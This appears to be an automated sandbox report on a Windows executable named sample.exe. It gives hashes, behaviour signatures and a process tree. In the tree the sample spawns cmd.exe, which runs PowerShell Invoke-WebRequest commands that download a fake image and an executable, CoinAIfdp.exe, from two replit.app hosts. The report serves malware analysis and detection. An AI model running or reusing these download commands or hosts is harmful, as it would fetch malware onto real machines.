Analysis
-
max time kernel
122s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
30-07-2024 08:27
Static task
static1
Behavioral task
behavioral1
Sample
sample.exe
Resource
win7-20240708-en
General
-
Target
sample.exe
-
Size
510KB
-
MD5
2b19d65705eee546214513fb65948b2a
-
SHA1
20b6c01b9f20047fc9f3bf9baa14b5046cbc0012
-
SHA256
106dc2ab6da5448b983e66c7c6850533006abf9176eb6ee3d58e101b83d8d47f
-
SHA512
183bb9331b20d2f4118820bd372e5202220e29cfea2d5ae5fedd8d1a9bfaf548a9399aa604950553948899a1d75658e64480c660ce7f83bb89cd566e1385eb72
-
SSDEEP
6144:+ldk1cWQRNTB2/Me7eC9g1HGnKBvYfew0PjZmwvhhlJdZBuUwXtgZcJeJ:+cv0NTg/XrRnKBwfOM0dayZKeJ
Malware Config
Signatures
-
pid Process 904 powershell.exe 2260 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sample.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 904 powershell.exe 2260 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 904 powershell.exe Token: SeDebugPrivilege 2260 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2056 wrote to memory of 2148 2056 sample.exe 30 PID 2056 wrote to memory of 2148 2056 sample.exe 30 PID 2056 wrote to memory of 2148 2056 sample.exe 30 PID 2056 wrote to memory of 2148 2056 sample.exe 30 PID 2148 wrote to memory of 904 2148 cmd.exe 32 PID 2148 wrote to memory of 904 2148 cmd.exe 32 PID 2148 wrote to memory of 904 2148 cmd.exe 32 PID 2148 wrote to memory of 2260 2148 cmd.exe 33 PID 2148 wrote to memory of 2260 2148 cmd.exe 33 PID 2148 wrote to memory of 2260 2148 cmd.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\sample.exe"C:\Users\Admin\AppData\Local\Temp\sample.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BD47.tmp\BD48.tmp\BD49.bat C:\Users\Admin\AppData\Local\Temp\sample.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
329B
MD591f265d84f2c400c6f731982fbc1dd26
SHA16d175c5694e58dd4d0ea55e77679de57105c6b0d
SHA256ded4d515b9bcfdd3221da6239dc2fac799b129712ffcc1f92722a2c508a0c173
SHA5124ea36db68fa533eb1b55d365abf400c9fc6cca8968b1950da2c02fd56f72b7a031583c8c730a4003354f2b010a879e94d15b80a3595e50581c72ad25c75bb67b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD56c93a314590022e5903024495758ac41
SHA1d703619449bb98220c160217a3ab0718eecf716d
SHA256635acb12569597ad2d2a3f88f427f6588f9b0c93259d9a2d26ba0c3eec4a3855
SHA5129115de23290e711685afd4c4684d32cabaa60cfb923076dff0bc52d441a711eb90ffb8d15057c8d3448317900ca4cf1d7e6ea5e312269b7c4e6137e305ff5609